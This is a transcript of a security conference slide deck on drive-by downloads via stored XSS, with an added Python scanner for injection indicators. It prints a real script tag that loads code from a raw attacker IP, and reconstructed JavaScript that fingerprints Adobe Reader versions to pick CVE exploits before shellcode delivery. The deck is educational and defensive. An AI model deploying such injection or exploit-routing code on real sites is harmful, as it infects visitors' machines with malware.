Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
1. Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
   Lars Ewe, Cenzic
   Neil Daswani, Dasient
2. Drive-By via XSS on RSA Conf Website
   - Discovered by Gerry Eisenhaur (Dasient)
   - Persistent XSS in Jive
   - “Benign” drive-by injected / pops up calc.exe
   - Script element embedded in a “tag” at: https://365.rsaconference.com/people/gerrye?view=bookmarks
   - Un-escaped tag (and benign drive-by) rendered at https://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102
   - Yet again: use of SSL alone does not provide security; the code must be made secure as well!
26. Step 1: Inject Really Malicious JavaScript
   - Sources in malicious JavaScript from a compromised IP!
   - Infects the user's machine silently
   - <script id=_0_ src=//218.93.202.61/cp/></script>
27. Step 2: Invoke Client-Side Vulnerability
   - CVE-2008-2992: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.
   - CVE-2007-5659: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.
   - CVE-2009-0927: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object.
28. Step 2: Ex. Fingerprint PDF Reader
   - JavaScript generates a zero-size IFRAME in the web page that sources in a PDF file
   - The PDF file has JavaScript that fingerprints the version of the PDF reader (note: the JavaScript interpreter used by the PDF reader is different from the one used by the browser)
   - The attacker needs to determine which version of the PDF reader / JavaScript interpreter to target
29. Step 2: Ex. Fingerprint PDF Reader
   (The comparison operators and the regex were garbled in the slide export as "DA" and "//"; "<" and /\./g below are reconstructed from the version ranges listed on slide 27.)

   function pdf_start() {
       // Acrobat's own JavaScript API exposes the reader version, e.g. "8.1.2"
       var version = app.viewerVersion.toString();
       version = version.replace(/\./g, '');            // "8.1.2" -> "812"
       var version_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
       // 8.0.x and 8.1.0 - 8.1.2: util.printf overflow (CVE-2008-2992)
       if ((version_array[0] == 8) && (version_array[1] == 0) || (version_array[1] == 1 && version_array[2] < 3)) { util_printf(); }
       // below 8.1.2: Reader 8.1.1-and-earlier overflows (CVE-2007-5659)
       if ((version_array[0] < 8) || (version_array[0] == 8 && version_array[1] < 2 && version_array[2] < 2)) { collab_email(); }
       // below 9.1: Collab.getIcon overflow (CVE-2009-0927)
       if ((version_array[0] < 9) || (version_array[0] == 9 && version_array[1] < 1)) { collab_geticon(); }
   }
   pdf_start();
30. Step 3: Deliver Shellcode
   - Depending upon the version of Adobe PDF Reader / JavaScript interpreter, send the appropriate shellcode
   - “Spray” the heap with assembly instructions that give shell access
   - Call a PDF reader helper function that jumps to the shellcode on the heap (e.g., collab_email())
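As an added example (not from the slides), a small Python scanner that flags the two page-level indicators the three steps above depend on: a script element whose src points at a raw IP address (slide 26) and a zero-size IFRAME used to pull the PDF in silently (slide 28). The sample HTML and the 203.0.113.5 address are constructed; everything else is the Python standard library.

```python
"""Flag the drive-by injection indicators from slides 26-28 in an HTML page: <script>
sources pointing at a raw IP address and zero-size IFRAMEs that load a PDF silently."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

ZERO_DIM = re.compile(r"^\s*0+(px|%)?\s*$")                    # width="0", height="0px"
ZERO_STYLE = re.compile(r"(width|height)\s*:\s*0(px|%)?\s*(;|$)")  # style="width:0;height:0"

def host_is_raw_ip(src):
    if src.startswith("//"):          # protocol-relative form, as on slide 26
        src = "http:" + src
    host = urlsplit(src).hostname
    if not host:                      # relative path such as /js/app.js
        return False
    try:
        ipaddress.ip_address(host)    # accepts IPv4 and IPv6 literals
        return True
    except ValueError:
        return False

class DriveByScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []            # (indicator, src) tuples

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)               # valueless attributes map to None
        if tag == "script" and a.get("src") and host_is_raw_ip(a["src"]):
            self.findings.append(("script-src-raw-ip", a["src"]))
        if tag == "iframe":
            style = a.get("style") or ""
            hidden = (ZERO_DIM.match(a.get("width") or "") and ZERO_DIM.match(a.get("height") or "")) or ZERO_STYLE.search(style)
            if hidden:
                self.findings.append(("zero-size-iframe", a.get("src") or ""))

def scan_html(html):
    scanner = DriveByScanner()
    scanner.feed(html)
    return scanner.findings

# Constructed sample; 203.0.113.5 (TEST-NET-3) stands in for the raw-IP source on slide 26.
SAMPLE = """<html><body><p>profile page</p>
<script src="/js/app.js"></script>
<script id=_0_ src=//203.0.113.5/cp/></script>
<iframe src="http://203.0.113.5/x.pdf" width="0" height="0"></iframe>
<iframe src="https://example.com/embed" width="600" height="400"></iframe>
</body></html>"""
```

Run `scan_html(SAMPLE)` to get the two findings; the benign script and the visible iframe are not reported.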
45. Manage Website Risk
   [Chart: risk score from Low to High]
   - Fast & easy: test all apps via HealthCheck
   - Strong testing for important apps
   - Robust testing for critical apps
46. Takeaways: What You Should Do Within 3 Months
   - Test ALL your web applications via a HealthCheck
   - Test for both application vulnerabilities and malware
   - Prioritize your vulnerabilities based on risk score
   - Block until you remediate
   - Get the Feb 2011 Ponemon research report on the state of web application security
52. Thank You!
   Lars Ewe, Cenzic
   Neil Daswani, Dasient
Editor's notes
- Use a web application vulnerability (stored XSS) to inject a legitimate web page with malicious code (e.g., JavaScript, IFRAME, etc.)
- Invoke a client-side vulnerability (e.g., IE zero-day, PDF exploit, etc.) OR use social engineering
- Deliver shellcode to take control
- Send a “downloader”
- Deliver malware of the attacker's choice